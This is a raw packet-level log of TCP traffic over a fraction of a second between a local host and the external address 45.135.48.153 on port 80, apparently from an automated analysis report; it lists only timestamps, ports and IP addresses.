Apr 19, 2022 16:44:42.894330025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894351006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894357920 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.894371033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894391060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894406080 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.894411087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894431114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894439936 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.894453049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894471884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894474983 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.894582987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894639015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894671917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.894690990 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.894788027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894906998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.895024061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.895072937 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.896483898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.897547007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.897571087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.897591114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.897627115 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.897649050 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.897784948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.897985935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.898046970 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.898050070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.898068905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.898089886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.898098946 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.898143053 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.898364067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.898493052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.898617983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.898638964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.898688078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.898688078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.898725033 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.898886919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.898909092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.898931980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.898952961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.898974895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.898974895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.898998022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.899010897 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.899019003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.899020910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.899039984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.899064064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.899070024 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.899128914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.899179935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.899250984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.899303913 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.899458885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.899533987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.899652958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.899715900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.899764061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.899813890 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.899904013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.900028944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.900157928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.900218964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.900276899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.900330067 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.900348902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.900547028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.900607109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.900669098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.900670052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.900717974 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.900798082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.900819063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.900852919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.900876045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.900897980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.900907040 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.900918961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.900935888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.900940895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.900963068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.900964022 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.900985956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.901007891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.901015997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.901030064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.901051044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.901051044 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.901072979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.901093960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.901114941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.901118994 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.901137114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.901145935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.901174068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.901185989 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.901521921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.901585102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.902674913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.903299093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.903354883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.903423071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.903561115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.903616905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.903677940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.903687954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.903872013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.903929949 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.903935909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.903984070 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.904067039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.904134989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.904189110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.904320955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.904381990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.904438019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.904496908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.904580116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.904639959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.904700041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.904836893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.904895067 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.904951096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905086040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905149937 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.905153036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905174971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905198097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905220032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905241013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905246973 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.905262947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905276060 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.905283928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905304909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905313015 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.905327082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905349970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905371904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905375004 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.905392885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905404091 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.905415058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905436039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905447006 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.905457020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905479908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905502081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905505896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.905524969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905534983 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.905546904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905567884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905575037 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.905611992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.905658007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905774117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905879021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.905939102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.905998945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.906054974 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.906761885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.907738924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.908567905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.908590078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.908648968 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.908677101 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.908792019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.908929110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.909055948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.909117937 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.909177065 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.909207106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.909241915 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.909297943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.909348011 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.909440994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.909574032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.909697056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.909718990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.909761906 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.909787893 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.909950972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.909971952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.909992933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.910015106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.910036087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.910048008 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.910058975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.910075903 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.910079002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.910100937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.910106897 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.910124063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.910144091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.910154104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.910187960 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.910348892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.910398006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.910464048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.910528898 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.910660028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.910721064 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.910792112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.910914898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.911036015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.911106110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.911165953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.911220074 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.911289930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.911358118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.911422968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.911484003 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.911613941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.911760092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.911782980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.911806107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.911827087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.911834002 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.911847115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.911849022 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.911865950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.911869049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.911890984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.911911964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.911935091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.911942005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.911956072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.911976099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.911978006 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.911998987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.912004948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.912019014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.912039995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.912053108 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.912061930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.912112951 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.912516117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.912580013 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.913674116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.913791895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.913851976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.913913965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.913969994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.914019108 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.914114952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.914190054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.914238930 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.914242029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.914431095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.914493084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.914546967 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.914561987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.914685011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.914737940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.914794922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.914943933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.915009975 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.915065050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.915116072 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.915201902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.915261984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.915390015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.915389061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.915519953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.915570974 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.915652990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.915715933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.915771008 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.915827990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.915903091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.915961027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.915982008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916002989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916024923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916028976 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.916044950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916066885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916074991 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.916085958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916106939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916114092 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.916129112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916148901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916155100 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.916169882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916192055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916210890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916213036 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.916232109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916239023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.916253090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916274071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916277885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.916321993 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.916346073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916429996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916485071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.916538954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916723013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916780949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916784048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.916917086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.916997910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.917006016 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.917803049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.918941975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.919012070 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.919595957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.919835091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.919899940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.919995070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.920041084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.920152903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.920237064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.920254946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.920308113 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.920485973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.920533895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.920557976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.920636892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.920794964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.920844078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.920875072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.920893908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.920919895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.920955896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.920974016 CEST	80	49758	45.135.48.153	192.168.2.4
